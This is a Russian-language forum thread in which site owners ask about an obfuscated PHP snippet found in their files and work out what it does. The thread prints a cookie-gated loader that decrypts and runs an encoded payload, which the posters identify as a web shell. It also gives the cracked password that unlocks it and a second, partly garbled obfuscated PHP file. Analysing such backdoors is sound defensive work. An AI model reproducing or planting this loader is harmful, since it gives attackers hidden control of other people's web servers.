Всем добра! Что это за хрень? Как раскодировать? Спойлер: хрень Код урезал, т.к. Пожалуйста, введите сообщение, размером не более чем 10000 символов. PHP: $l___l_='base'.(128/2).'_de'.'code';$l___l_=$l___l_(str_replace("\n", '', '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 **zP3XzATBt4xmt0KqV7lPp513n+y3C1hruU1Y4Ecd3dUaCThGXKYIl9Sp6RtnPnqZGUus04/ wFcfhFsT6QaVbAa4qPbZz7JRIyryblP4ncd4tss5gi0coua+jGdKoLFO2LaamftmcAxZltF3WKKx3w9F OaMnEVPSKEyHFIQTqzsqL/kxiStMggXImOepD+wSE6Ijll0wPX7LCdtOHiRfEPCz1XJ56e6XP6eRR+Ir joV4zA6QxtoCvP5U1QbGH/E2S8zIXp5X+D1RBxGnOv3OcAP89CJEilgu98Ic2OEqCwq80BZWzMuMj6xb vD+8pkUioUEFXN/P8YObt6wv7i0oN6nT9BQ9+g4tcmtmGHjxqAbDinEcWmPf+9fyxjlpsnEbeTooy+Cd mWHGI9u/rLU+x/WFPE5hl9kfCmBSjngnlcsOhfsHX3labdmwlV3AZ9afw82oBBy6v9/AnNWnd4Pg4IlW SXLGVcdHR6ca3U4F8vxQ1LcrV267Ltbr5A9wMHAMibg695T6vJu95XXXcHpb+5TA6vRHJlS0SPCa/TMh aoq68WnOnIkng7k+LB3XWw6OJkhkPuoReTTz6ArhHCllLbgBncrqiKcdnnd7oUKuuxxsJmsLWcpEgNWy XshlukM86yC7aGsD0mAFsHG02/a1kGlijLmG9w0ZmMJKX4GDJa4qri/fcR8UVAqBijPrcSZBGTaxhxGk HZbTui9wFPeGIZHRP9f6hQj1OUobZ57r7Cr2uopNp6wKGETFuyn96fy39c/dJZO13GAUQ1Zg2fUfNwyU cAQ9Yt0C7KpEIsfiUxBEEQs/rHvaJD2+95ufGQoBBkN4C7YmRrW1KHOdA8rYpAH60IzfzQJQGgmFHavl b+8zbUyINqNWW7Av3vO8iJNYn/+ebMsUnuPsWUMCp9FTSArDwdW1NqPpd+9aIyYK5Aj6wSe8THQ94lo7 N7xZfUbMYZPfKF5YJSIirQT9Klg7dw8u24Ub1zXRNNrTrJpSqyzjqLwL70rd57RmKRVXgeWCSWpNMWcR 2aQm2zxbzi6aAiIWO18uhTU9X+yFrCYxXlgZcn57+ZsJy/nCXaQKvKn4UyCHp5zZN6dugzeyiLZpK+Ff oRPbGhzH/dSEMx91icdwtEK+d9iHaRIJ5cScykg7Ml32ZYw1ssHjPCtmGvrINaBvsfooQPrg4yLKm0cQ c+1CYz6M07Nzw0QHFHktYZtll5n3V0Yem/VJumr/gkGUMSEn5N2HmXmKOAWWz9I9H01XpKlFAGn003zN *** Eo9PvtA05UB6/CtdJm0lLbtRXDNJFQv+aTdT/A7AP+b54+sBmyQGKmHpSgdk17AVShHwbnRwPzlVioK+ fQZCFv2VUlWhY8B3yl1Bo5Bq5v2x4AjvIZLuNMxTz71lkM55lGvvOEeOSatfXBWq6fRB4jxfqzL+1Ooa WvnHyaiCMLsAL16j3igfBnlAIPMcTXpGwxmZApKE0AjORdpu+pqE9fE6Ow/VQ6YRmbxqIOS9njn2VN0r FzTaqLvV0jalduWMvOKVQsgMAb9cTNTNJL9dXPLqo0jb3NcNlBjMrHFNa3OzDuyqQowvrCAMcAZpALIf c6cGhfi6Pzu/2sxrv224GMmqxaBAU35YrD2wV2tv7XS/wRdb3VpymktFTwurF334R11GQNhaXts4HML6 JOA54wvlZtv1foTyl5cCvcEkfEqa8qWHrjCNsGhwBnEA+ixah7v7rt6R9mp84UwkqbjZ4iY6878dvAln EMI2QCQ17zak0hytXJyXRuaOLrEPhTqPFhYyWfQg+955QWSVCSn2sI42Z+H5yX28c2o4iFlUy3Yst5GG reCab6DL7FF040XZFQcLDOx2X/0NUzNMsFBOqW6lzWY9uJQoWrWtAx+fzDe/4yzyAYJvQLgMcFm41Zz1 PUpwhAMazo/nyOayCBMKq1WJ8TywI/5al1fgX553e0mDLdy4+dm5w8nbc1yU56+3M9GBnIt4Rz/EmOAo IFbJmQWn36kITqY2X/SkMKLsvQYGIhJkNwLm5b8twLdWcKhRfb2aSJ52p1bqu9M2H8UcfM0mcYY6LUMh P4Bd7MyyCSSJpASZuyNFNNpC7omWdJ36hW58RNdoqE8WbcTjhs4rCte7SMjr7za2ZJ3q4pFnTPYbAPmo bLGhQoQSlqq2ESKH7Zt0DnnLP2l+XVVLtYpdMMvcJ0HMvCL7QF840BXygJv8YBkVeoV+10sdDF14gxjz 46/QYANqLMPIbhln44RAO1KRkS9wJ9QSvcQHaXLe8pOCQK5xcXwdSG15pvDz/Ax4LwBoXyVJomRTO+jC f5LZgyTmzyWdDuxVDawNb5bG688JVQDNfXPtlL4vpfZUt8txOgygsTLUoPsTYGQNUszev9vUDDDyRqvD Rn9qPY0tPyYVq4KKhUZnTNdDeBLMVQsbYBZEf0mMiFKZ41L+8xyMMV1XkMhNappbaGpXflGnL/N0FwyG KviK68GzOCMQgp4qV1jSCRd3ksx8dQgGMdx0ZtLjCBO8iJPB00QYlGZe16DT5PTiPy8hw2PleoDopg4q FukNDoOw//StZlxJj5Gl5TpNo4xVVw5PdCPc8vvFajj+/r9ugiQdEVonecfBF7zfPNGidU+dRLILS6S/ 5Zo/vRaJ/JnsNrujm+KX5j/CC14mkBtD7THcgOg6FgUesIPheOC79My6Glq1xpCqNq4HX/S7MrKA43RZ H3blJ4XeZ21aLTuJM6YsXPneutn9zSkMLOw3Kmv+TxkZYg9f9tBVuEpj7DazfLGml+WDcVVksw/Q2Z0L 0hcCqvd/g56fxG2JyYxOyzAdF1nt04fv9yjTSgbv8y1lO/diqkuohNR7KiMY0U6c0S0LkfYYOJN2vtcY MOnHwrN8Eg+Q4vsuL1b+uf16BuoOnbkcqmW4BWwNcl3+hXd70kkekYUIPYRrEjIHK2q3VMbgeETkSG1o behQO7Jv5hzrTtpoOwLbMkzBkzCqDDc8CfgSzp7XHuoRmQ4DBuoE6fgfFDQBasIsH6KSc8fo/u5ur3yX AIKvh8QVxrVApvt9RsyW8n4QffSfJ06UhDyppt/CzGhtRnAvCKnGJIibKKE3SawDGQ3mDetgkxFURGTW *** T07yKOauIqgl+ErvxZ+EWsxGCeyXbSw= '));if(isset($_COOKIE['sP'])){$l__l_=$_COOKIE['sP'];$l__l_=md5($l__l_).substr(MD5(strrev($l__l_)),0,strlen($l__l_));for($l____l_=0;$l____l_<15563;$l____l_++){$l___l_[$l____l_]=chr(( ord($l___l_[$l____l_])-ord($l__l_[$l____l_]))%256);$l__l_.=$l___l_[$l____l_];}if($l___l_=@gzinflate($l___l_)){$l____l_=create_function('',$l___l_);unset($l___l_,$l__l_);$l____l_();}} P.S. Видимо что-то не хорошее, если base64_decode так написано: PHP: $l___l_='base'.(128/2).'_de'.'code';
Онлайн декодеры тут не помогут т.к. для расшифровки нужен пароль, который должен быть в куках. PHP: $data = base64_decode(' ... '); if (isset($_COOKIE['sP'])) { $pass = $_COOKIE['sP']; $pass = md5($pass).substr(md5(strrev($pass)),0,strlen($pass)); for ($i = 0; $i<15563; $i++) { $data[$i] = chr(( ord($data[$i])-ord($pass[$i]))%256); $pass .= $data[$i]; } if ($data = @gzinflate($data)) { $func = create_function('',$data); $func(); } } Для шифрования там использовался md5 хэш 9391301577293346b1e12718ffe31353 - это хэш от пароля 7777777q. Можно добавить в самое начало файла. PHP: $_COOKIE['sP'] = '7777777q';
Парни, вот что получилось... Спойлер: скрин И работа с базой, и Explorer который выводит список всех файлов и с ними можно работать и куча всякой хрени. Вопрос: Как это запускается? Этот код внутри файла.
Тот код взят из старпоста и приведён в более читаемый вид. Он там в самом конце. Т.е. выполняется это как обычный скрипт, но расшифровка и дальнейший запуск происходят только при наличии куки sP=7777777q
ужс. Где-то что-то может писать в файлы по непроверяемому пути или запускать файлы из папки загрузки юзерских
Еще нашел... PHP файл PHP: <? $§[]=$§;$§=$§.$§;$?=+$§;$?=$?;$?++;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$?=$?+$?;$ї=$?+$?;$?=$§[$?]|($§[$?]^);$?=$§[$?];$?=$§[$?]|($§[$?]&a);$?=$§[$ї+$?];$?=$?^($?.?);$?=$?.$?.$?;$?=$?($ї.$?).$?($?.$?.$?).$?($?.$?.$?).$?($?.$?.$?).$?.$?($?.$?.$?);$?($?($?.$?.$?).$?($?.$?.$?).$?($ї.$?).$?($?.$?.$?).$?($?.$?).$?($?.$?).$?($?.$?).$?($ї.$?).$?($?.$?).$?($?.$ї).$?($?.$?).$?($ї.$?).$?($?.$ї).$?($?.$?.$?).$?($?.$?.$?).$?($?.$ї).$?($ї.$?).$?($?.$?).$?($?.$ї)); ?> Как узнать что там?